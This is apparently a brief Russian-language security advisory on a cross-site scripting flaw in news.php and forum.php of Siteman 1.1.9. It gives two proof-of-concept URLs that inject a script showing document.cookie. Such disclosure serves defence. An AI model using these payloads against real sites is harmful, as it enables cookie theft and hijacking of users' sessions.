Программа: Siteman 1.1.9 

Уязвимость позволяет злоумышленнику произвести XSS нападение и получить доступ к важным данным пользователей.
Уязвимость существует в сценариях news.php и forums.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы. 

Пример: 

http://[target]/forum.php?do=viewtopic& cat=1&topic=1&page=1?">
<script>alert(document.cookie)</script> 

http://[target]/news.php?do=showone& id=1&page=1?" >< script>alert(document.cookie)</script>

Оставить мнение